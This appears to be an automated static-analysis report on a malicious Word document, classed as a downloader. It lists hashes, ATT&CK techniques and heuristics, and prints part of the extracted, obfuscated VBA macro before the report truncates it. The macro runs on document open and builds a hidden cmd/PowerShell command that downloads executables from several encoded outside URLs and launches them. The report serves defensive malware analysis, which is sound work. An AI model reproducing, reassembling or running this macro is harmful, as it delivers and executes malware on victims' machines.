Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 80f83256ca13fe91…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 65.5 KB
Created: 2018-09-07 08:00:00
Authoring application: Microsoft Office Word
First seen: 2019-06-27
MD5: 1db002ebff0914f9184b6c6938176976
SHA-1: 2d4519ec75738c87f564e811928a9bb0f7049aac
SHA-256: 80f83256ca13fe9166bc77504a8458e1ee6e8523954e6313b7a9da366ec4e4ae
Risk Score: 182

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros. The critical heuristic OLE_VBA_SHELL indicates a call to the Shell() function, which is likely made from the Document_open macro to download and execute a second-stage payload. The ClamAV detection name Doc.Downloader.Valyria-6922861-0 further supports its classification as a downloader. The VBA code is obfuscated, but the intent to execute an external command is clear.

Heuristics (5)

  • ClamAV: Doc.Downloader.Valyria-6922861-0 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Downloader.Valyria-6922861-0
  • VBA macros detected [medium, OLE_VBA_MACROS, 2 related findings]
    Document contains VBA macro code
  • Shell() call in VBA [critical, OLE_VBA_SHELL]
    Shell() call in VBA
  • Document_Open macro [high, OLE_VBA_DOCOPEN]
    Document_Open macro
  • Embedded URL [info, EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 6841 bytes
SHA-256: 4f72a6ca054415afb3bfaf93e2e41e056982cf634768092e3d5d0cd4c12c3ceb
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ZIMUIGEpYcSzfp"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
   Month Format("8379" + "166825450" + "f" + "nS")
   Month Format("iwn" + "SOQQufkvEHHU")
   Month Format("Vad" + "swX")
   Month Format("BPRTWqH" + "123990321" + "61931562" + "jZRQ")
   Month Format("nr" + "195608342" + "OUiLtWlQz" + "Jzzkq")
   Month Format("ZZfUMkYGbI" + "wT" + "TK" + "FPaPPVmth")
   Month Format("6872" + "woP" + "CVCWa" + "E")
   Month Format("a" + "tW")
   Month Format("acDc" + "HJJR" + "JE" + "biDpJntsuzWwj")
   Month Format("99917046" + "Vt" + "5498" + "198414324")
Shell Format(fYriA) + Format(bvGWQah) + Format(DfWwcwcDPZ) + qEFDRHiTp + MFzZTB + Format(EdGfjFQlB) + Format(hbZmULGCT), Format(vbHide)
   Month Format("iSIZZii" + "nc")
   Month Format("351743984" + "jiOIjA")
   Month Format("7045" + "9099")
End Sub



Attribute VB_Name = "diBSboziQXGmZw"
Function qEFDRHiTp()

On _
Error _
Resume _
Next
Month Format("248269970" + "40418352")
   Month Format("4540" + "ulwZ")
jMovfchjU = Chr(0 + 2 + 6 + 18 + 73) + "md /" + "V^:/" + Chr(0 + 1 + 4 + 12 + 50) + Chr(0 + 0 + 2 + 5 + 27) + "^s" + "^et z^" + "q" + "^j8=" + "^  ^"
Month Format("oEnAPOPhV" + "SYw" + "jrF" + "KzZD")
   Month Format("ovPz" + "6875")
GpKMajLMD = "     " + "^" + "   ^  " + "   ^ ^ " + "^}}{^h" + Chr(0 + 2 + 6 + 18 + 73)
Month Format("jFENKmPnR" + "129350848" + "J" + "mpCYiKtqfwkIl")
sOqzwE = "ta" + Chr(0 + 2 + 6 + 18 + 73) + "^" + "};k" + "^aerb^;" + "jq^j$ " + "^me^t^" + "I-^eko" + "vnI;)" + "^jq" + "j" + "^$^" + " ^,V"
Month Format("T" + "277300603" + "QjWT" + "1384")
   Month Format("sv" + "307064985")
   Month Format("sBYF" + "5333" + "358040471" + "369408302")
rkSpl = "T^O^$(" + "e^l" + "iFd" + "ao^ln^w" + "^oD^." + "VR^T^" + "${^yr" + "t{)p"
Month Format("131691278" + "loAYGo" + "300464565" + "crlZwRbYOAwwv")
   Month Format("6481" + "279094329" + "Gm" + "joHIS")
   Month Format("426729368" + "Gj")
   Month Format("wb" + "u" + "T" + "ld")
zWAPVL = "m^" + "i^$ " + "n" + "^i" + " VT^" + "O$(^h" + Chr(0 + 2 + 6 + 18 + 73) + "a" + "^e" + "r^" + "of;'^e"
Month Format("299109251" + "367796560")
   Month Format("nZKljtACqzD" + "HtijDz" + "JiWC" + "316024205")
OEFGc = "x" + "^e.'" + "^" + "+FaR^" + "$+" + "^'^\^'" + "+" + Chr(0 + 2 + 6 + 18 + 73) + "i^lb" + "^up^"
Month Format("1390" + "THn" + "2648" + "518757823")
   Month Format("454" + "iHswkW")
   Month Format("3893" + "SdO" + "97180029" + "2395")
DRlhnPjS = ":v" + "ne$" + "^=j^" + "q^j$^;'" + "8^2" + "4^'^ ^" + "=^ " + "^FaR$^;" + ")^'@^" + "'(t" + "ilpS." + "'^6^" + "XLE^B^d"
Month Format("FG" + "U")
   Month Format("PY" + "4271" + "Q" + "lzE")
   Month Format("ZFBH" + "XA" + "YasPFqkqt" + "zC")
rXpCz = "^" + "b^E" + "F^" + "k/^mo" + Chr(0 + 2 + 6 + 18 + 73) + "^.s" + "e^i" + "^g" + "^ol" + "^" + "on^h" + Chr(0 + 2 + 6 + 18 + 73) + "^"
Month Format("387072345" + "siNbGUJ")
   Month Format("UXsHA" + "192559679" + "nPMwW" + "wTpd")
GwWDYcp = "etna" + "vda/" + "/^:^p" + "^" + "tt^h^@"
Month Format("141478964" + "OhUOFsN")
zPoMMiP = "^g5" + "9Q" + "L" + "oG/a" + "u^" + ".m" + "^o" + Chr(0 + 2 + 6 + 18 + 73) + "^" + ".s^" + "p" + "^i^" + "h" + Chr(0 + 2 + 6 + 18 + 73) + "^"
Month Format("nn" + "XVmrjAQ")
   Month Format("krNQ" + "5749" + "503198924" + "254865589")
HRwtwL = "do^o^w" + "//^:" + "p" + "^tth@" + "6Ur^g" + "rTZD/" + "^tnetn^" + "o" + Chr(0 + 2 + 6 + 18 + 73) + "^-^p^" + "w"
Month Format("Xz" + "337978206")
CICWizhj = "/ri^." + Chr(0 + 2 + 6 + 18 + 73) + "a" + "^.umhs" + "^.^udr" + Chr(0 + 2 + 6 + 18 + 73) + "//" + ":^p^" + "t" + "^t" + "h^@F^" + "D^8vH^f" + "L/^"
qEFDRHiTp = jMovfchjU + GpKMajLMD + sOqzwE + rkSpl + zWAPVL + OEFGc + DRlhnPjS + rXpCz + GwWDYcp + zPoMMiP + HRwtwL + CICWizhj
   Month Format("QtzJmOm" + "QzZLi")
   Month Format("166967013" + "111108699")
 
... (truncated)